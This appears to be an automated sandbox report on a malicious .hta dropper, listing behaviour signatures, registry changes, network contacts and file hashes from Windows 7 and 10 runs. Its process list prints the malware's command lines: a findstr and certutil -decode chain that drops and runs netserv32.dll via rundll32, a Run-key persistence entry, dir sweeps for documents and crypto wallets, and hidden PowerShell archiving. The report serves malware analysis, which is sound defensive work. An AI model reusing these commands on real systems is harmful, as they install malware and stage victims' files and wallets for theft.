Analysis Overview
SHA256
bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234
Threat Level: Likely malicious
The file bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Manipulates Digital Signatures
Blocklisted process makes network request
Looks for VMWare Tools registry key
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Deobfuscate/Decode Files or Information
Adds Run key to start application
Accesses Microsoft Outlook accounts
UPX packed file
Checks for VirtualBox DLLs, possible anti-VM trick
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Modifies Internet Explorer settings
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-02 08:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-02 08:04
Reported
2024-11-02 08:07
Platform
win7-20240903-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Windows\system32\rundll32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\system32\rundll32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork" | C:\Windows\system32\rundll32.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork
C:\Windows\SysWOW64\findstr.exe
findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
C:\Windows\SysWOW64\findstr.exe
findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
C:\Windows\SysWOW64\certutil.exe
certutil -decode -f 1.log password.txt
C:\Windows\SysWOW64\certutil.exe
certutil -decode -f 1.log netserv32.dll
C:\Windows\SysWOW64\rundll32.exe
rundll32 netserv32.dll,MainWork
C:\Windows\system32\rundll32.exe
rundll32 netserv32.dll,MainWork
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"
C:\Windows\system32\cmd.exe
cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.glitch.global | udp |
| US | 151.101.2.132:80 | cdn.glitch.global | tcp |
| US | 131.153.13.235:80 | 131.153.13.235 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\1.log
| MD5 | 2ac7510166832b4a6e4344f37d944578 |
| SHA1 | c766dd5112d72620614842d4bf0e986c34c5a2d0 |
| SHA256 | 09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad |
| SHA512 | ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a |
C:\Users\Admin\AppData\Local\1.log
| MD5 | 71593a662d03e58b27b29ab199a6d7b5 |
| SHA1 | d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2 |
| SHA256 | e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237 |
| SHA512 | c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07 |
\Users\Admin\AppData\Local\netserv32.dll
| MD5 | 56d4fcfa7eb3a84740081264c5c0f10a |
| SHA1 | 06edf5464d2cfe1a75f3600c9039eabab97248bd |
| SHA256 | 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e |
| SHA512 | df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609 |
memory/2724-36-0x0000000000220000-0x000000000023F000-memory.dmp
memory/2724-33-0x0000000000220000-0x000000000023F000-memory.dmp
memory/2724-35-0x0000000000220000-0x000000000023F000-memory.dmp
memory/2724-34-0x0000000000220000-0x000000000023F000-memory.dmp
memory/2844-54-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
memory/2844-53-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
memory/2844-52-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\password.txt
| MD5 | 6a0e721cb89a06736206b91af92239cd |
| SHA1 | bb87db8bbcb512a584c45c80504fc21a0a972b3a |
| SHA256 | a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015 |
| SHA512 | c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c |
memory/2844-64-0x0000000180000000-0x0000000180127000-memory.dmp
C:\Users\Admin\AppData\Local\net
| MD5 | de9438683614ccf3f0316139418985a9 |
| SHA1 | dcbbfb18c16f4bf9025233e6ecf42be64c33932d |
| SHA256 | d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b |
| SHA512 | 925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470 |
memory/2844-67-0x0000000180000000-0x0000000180127000-memory.dmp
memory/2844-68-0x0000000180000000-0x0000000180127000-memory.dmp
memory/1928-85-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/1928-86-0x0000000002890000-0x0000000002898000-memory.dmp
memory/2724-92-0x0000000000220000-0x000000000023F000-memory.dmp
memory/2724-94-0x0000000000220000-0x000000000023F000-memory.dmp
C:\Users\Admin\AppData\Local\notepad.log
| MD5 | 6199c9d0ad1df4105c85ae041e833a0e |
| SHA1 | c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1 |
| SHA256 | c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4 |
| SHA512 | b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3 |
memory/2844-101-0x0000000180000000-0x0000000180032000-memory.dmp
memory/2844-117-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
memory/2844-119-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
memory/2844-118-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
memory/2844-121-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
\??\c:\users\admin\appdata\local\netlist.log
| MD5 | 4c3a362b3f3e30e0d09cf23cf206d4f3 |
| SHA1 | 8c83105c017fdd64b2bc094f295bfaa8ce074b39 |
| SHA256 | 47efee3b0891b28c7ad69ba95c06f5fd2a45e0df0e4ec62307a24793a51b52bd |
| SHA512 | c78174e522de99a4774b764d0b465d8dc0035d4aa4e46a5306f3985afc814af0290c1af11b78c0656d6915b0ddc36ecc726a21666694ebecc87277120f9dfda4 |
\??\c:\users\admin\appdata\local\netlist.log
| MD5 | 38eb30a99834452a25809864e7116beb |
| SHA1 | 80271700c164e13a7a871d8530a71898bf4a64bc |
| SHA256 | 77062eba27314013f04f6a3aad6c6d60d5e2a9a9a289ea34fd83e87ccf9167b0 |
| SHA512 | 48e013c5ca505310ee98f059c84fc619e1e41b03ab3fc9248688194e75eaa8a56bc7a6a68cb100c42115170b5791ba29d66ad381f2e4298660f0c72f8c4ed208 |
memory/2844-134-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
memory/2844-139-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
memory/2844-140-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-02 08:04
Reported
2024-11-02 08:07
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Windows\system32\rundll32.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\system32\rundll32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork" | C:\Windows\system32\rundll32.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Windows\system32\rundll32.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork
C:\Windows\SysWOW64\findstr.exe
findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
C:\Windows\SysWOW64\findstr.exe
findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
C:\Windows\SysWOW64\certutil.exe
certutil -decode -f 1.log netserv32.dll
C:\Windows\SysWOW64\certutil.exe
certutil -decode -f 1.log password.txt
C:\Windows\SysWOW64\rundll32.exe
rundll32 netserv32.dll,MainWork
C:\Windows\system32\rundll32.exe
rundll32 netserv32.dll,MainWork
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"
C:\Windows\system32\cmd.exe
cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
C:\Windows\system32\cmd.exe
cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.glitch.global | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 151.101.66.132:80 | cdn.glitch.global | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 131.153.13.235:80 | 131.153.13.235 | tcp |
| US | 8.8.8.8:53 | 235.13.153.131.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\1.log
| MD5 | 71593a662d03e58b27b29ab199a6d7b5 |
| SHA1 | d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2 |
| SHA256 | e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237 |
| SHA512 | c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07 |
C:\Users\Admin\AppData\Local\Temp\1.log
| MD5 | 2ac7510166832b4a6e4344f37d944578 |
| SHA1 | c766dd5112d72620614842d4bf0e986c34c5a2d0 |
| SHA256 | 09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad |
| SHA512 | ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a |
memory/1652-9-0x00000000003B0000-0x00000000003CF000-memory.dmp
C:\Users\Admin\AppData\Local\netserv32.dll
